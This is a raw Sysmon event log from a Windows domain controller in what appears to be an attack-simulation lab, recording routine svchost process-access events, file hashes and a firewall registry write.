12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.997{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.997{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.997{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CD3EF9F99138EAC7E9BD4E70A455A0F,SHA256=E687BBECF83FC03F7EB98CB82EB822CE50356212294756EBD4F9DA35C9C35273,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.912{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-2|C=S-1-15-3-3|C=S-1-15-3-4|C=S-1-15-3-6|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-3215430884-1339816292-89257616-1145831019|C=S-1-15-3-3071617654-1314403908-1117750160-3581451107|C=S-1-15-3-593192589-1214558892-284007604-3553228420|C=S-1-15-3-3870101518-1154309966-1696731070-4111764952|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-2345035983-1170044712-735049875-2883010875|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2569730672-1095266119-53537203-120937
5796|C=S-1-15-3-2452736844-1257488215-2818397580-3305426111|C=S-1-15-3-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|M=microsoft.windows.cortana_cw5n1h2txyewy|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\|PFN=Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy| 10341000x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windo